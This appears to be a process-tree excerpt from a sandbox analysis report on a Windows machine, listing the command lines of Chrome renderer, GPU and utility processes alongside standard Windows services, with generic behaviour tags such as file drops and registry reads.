C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4880,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4892 /prefetch:83⤵PID:2324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5004,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4932 /prefetch:83⤵PID:3328
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4932,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5192 /prefetch:83⤵PID:2652
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5208,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5112 /prefetch:83⤵PID:2324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5212,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4492 /prefetch:83⤵PID:868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5308,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4700 /prefetch:83⤵PID:4888
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5336,i,16939099863416844341,1759844967826749825,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5408 /prefetch:23⤵PID:5888
-
-
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --reenable-autoupdates --system-level3⤵
- Drops file in Program Files directory
PID:5296 -
C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe"C:\Program Files\Google\Chrome\Application\123.0.6312.123\Installer\setup.exe" --type=crashpad-handler /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Program Files\Crashpad" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0x28c,0x290,0x294,0x268,0x298,0x7ff653924698,0x7ff6539246a4,0x7ff6539246b04⤵
- Drops file in Program Files directory
PID:5280
-
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe"2⤵
- Enumerates system info in registry
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
- Suspicious use of AdjustPrivilegeToken
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
PID:5520 -
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Google\Chrome\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Google\Chrome\User Data" --url=https://clients2.google.com/cr/report --annotation=channel= --annotation=plat=Win64 --annotation=prod=Chrome --annotation=ver=123.0.6312.123 --initial-client-data=0xf8,0xfc,0x100,0xd4,0x104,0x7ffb4bc5cc40,0x7ffb4bc5cc4c,0x7ffb4bc5cc583⤵PID:5148
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2348,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2344 /prefetch:23⤵PID:5760
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=1924,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2380 /prefetch:33⤵PID:4920
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2040,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2492 /prefetch:83⤵PID:2324
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --field-trial-handle=3168,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3196 /prefetch:13⤵PID:5952
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --field-trial-handle=3204,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3228 /prefetch:13⤵PID:5960
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --field-trial-handle=3740,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4616 /prefetch:13⤵PID:2052
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.ProcessorMetrics --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=4824,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:83⤵PID:640
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4964,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4980 /prefetch:83⤵PID:1768
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4936,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:83⤵PID:2436
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4928,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5360 /prefetch:83⤵PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=5108,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5376 /prefetch:83⤵PID:5440
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=4960,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4908 /prefetch:83⤵PID:624
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --extension-process --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --field-trial-handle=5480,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5364 /prefetch:23⤵PID:3268
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --field-trial-handle=5028,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5096 /prefetch:13⤵PID:468
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --field-trial-handle=5012,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5072 /prefetch:13⤵PID:3344
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=17 --field-trial-handle=3588,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4772 /prefetch:13⤵PID:6972
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=3368,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3208 /prefetch:13⤵PID:1296
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=19 --field-trial-handle=3212,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4076 /prefetch:13⤵
- Drops file in Program Files directory
PID:6060
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=21 --field-trial-handle=3184,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3340 /prefetch:13⤵PID:3932
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=20 --field-trial-handle=3236,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3400 /prefetch:13⤵PID:6504
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=22 --field-trial-handle=5800,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4524 /prefetch:13⤵PID:5508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=23 --field-trial-handle=5940,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5816 /prefetch:13⤵
- Drops file in Program Files directory
PID:6544
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=4904,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6044 /prefetch:83⤵
- Drops file in Program Files directory
PID:6680
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=video_capture.mojom.VideoCaptureService --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3192,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6052 /prefetch:83⤵
- Drops file in Program Files directory
PID:6704
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6196,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5612 /prefetch:83⤵
- Drops file in Program Files directory
PID:2220
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6108,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6168 /prefetch:83⤵
- Drops file in Program Files directory
PID:6744
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6084,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6120 /prefetch:83⤵
- Drops file in Program Files directory
PID:6784
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6152,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6276 /prefetch:83⤵
- Drops file in Program Files directory
PID:6540
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6264,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6292 /prefetch:83⤵
- Drops file in Program Files directory
PID:6508
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6052,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6104 /prefetch:83⤵
- Drops file in Program Files directory
PID:7012
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6172,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6188 /prefetch:83⤵
- Drops file in Program Files directory
PID:6664
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6308,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6420 /prefetch:83⤵
- Drops file in Program Files directory
PID:6596
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6432,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6544 /prefetch:83⤵
- Drops file in Program Files directory
PID:6824
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6428,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6520 /prefetch:83⤵
- Drops file in Program Files directory
PID:6808
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6136,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6112 /prefetch:83⤵
- Drops file in Program Files directory
PID:6252
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6404,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6296 /prefetch:83⤵
- Drops file in Program Files directory
PID:4304
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6272,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6328 /prefetch:83⤵
- Drops file in Program Files directory
PID:6792
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6016,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6324 /prefetch:83⤵
- Drops file in Program Files directory
PID:6836
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6540,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6068 /prefetch:83⤵
- Drops file in Program Files directory
PID:6828
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6416,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6360 /prefetch:83⤵
- Drops file in Program Files directory
PID:6988
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6276,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6232 /prefetch:83⤵
- Drops file in Program Files directory
PID:6780
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6376,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6364 /prefetch:83⤵PID:7112
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5748,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6252 /prefetch:83⤵PID:6860
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=5716,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6300 /prefetch:83⤵PID:64
-
C:\Windows\system32\WerFault.exeC:\Windows\system32\WerFault.exe -u -p 64 -s 2284⤵
- Checks processor information in registry
- Enumerates system info in registry
PID:5996
-
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6184,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6256 /prefetch:83⤵PID:1980
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=audio.mojom.AudioService --lang=en-US --service-sandbox-type=audio --no-appcompat-clear --field-trial-handle=6088,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=6096 /prefetch:83⤵PID:7152
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=50 --field-trial-handle=3400,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5616 /prefetch:13⤵PID:5084
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=2384,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5864 /prefetch:23⤵PID:6064
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --no-appcompat-clear --gpu-preferences=WAAAAAAAAADgAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAAAEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=5504,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=1700 /prefetch:23⤵PID:6804
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=renderer --no-appcompat-clear --lang=en-US --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --field-trial-handle=4020,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=4052 /prefetch:13⤵PID:3868
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=data_decoder.mojom.DataDecoderService --lang=en-US --service-sandbox-type=service --no-appcompat-clear --field-trial-handle=2372,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=3952 /prefetch:83⤵PID:536
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --no-appcompat-clear --field-trial-handle=3264,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=2448 /prefetch:83⤵
- Modifies registry class
- Suspicious use of SetWindowsHookEx
PID:6632
-
-
C:\Program Files\Google\Chrome\Application\chrome.exe"C:\Program Files\Google\Chrome\Application\chrome.exe" --type=gpu-process --disable-gpu-sandbox --use-gl=disabled --gpu-vendor-id=4318 --gpu-device-id=140 --gpu-sub-system-id=0 --gpu-revision=0 --gpu-driver-version=10.0.19041.546 --no-appcompat-clear --gpu-preferences=WAAAAAAAAADoAAAMAAAAAAAAAAAAAAAAAABgAAEAAAA4AAAAAAAAAAAAAACEAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAGAAAAAAAAAAYAAAAAAAAAAgAAAAAAAAACAAAAAAAAAAIAAAAAAAAAA== --field-trial-handle=832,i,6957005955338398913,15199065632769655716,262144 --variations-seed-version=20241006-180150.222000 --mojo-platform-channel-handle=5852 /prefetch:83⤵
- Drops file in Program Files directory
PID:872
-
-
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k ClipboardSvcGroup -p -s cbdhsvc1⤵PID:3648
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:3836
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:4052
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵
- Suspicious use of UnmapMainImage
PID:4164
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k netsvcs -p -s wlidsvc1⤵PID:4128
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalSystemNetworkRestricted -p -s StorSvc1⤵PID:3536
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceAndNoImpersonation -p -s SSDPSRV1⤵PID:3192
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s WinHttpAutoProxySvc1⤵PID:2792
-
C:\Windows\system32\SppExtComObj.exeC:\Windows\system32\SppExtComObj.exe -Embedding1⤵PID:3364
-
C:\Windows\System32\svchost.exeC:\Windows\System32\svchost.exe -k LocalService -p -s LicenseManager1⤵PID:3832
-
C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe"C:\Program Files\Common Files\Microsoft Shared\ClickToRun\OfficeClickToRun.exe" /service1⤵
- Drops file in System32 directory
- Modifies data under HKEY_USERS
PID:2036
-
C:\Windows\system32\DllHost.exeC:\Windows\system32\DllHost.exe /Processid:{3EB3C877-1F16-487C-9050-104DBCD66683}1⤵PID:2328
-
C:\Windows\system32\svchost.exeC:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted -p -s NgcCtnrSvc1⤵PID:2040
-
C:\Windows\System32\RuntimeBroker.exeC:\Windows\System32\RuntimeBroker.exe -Embedding1⤵PID:5024
-
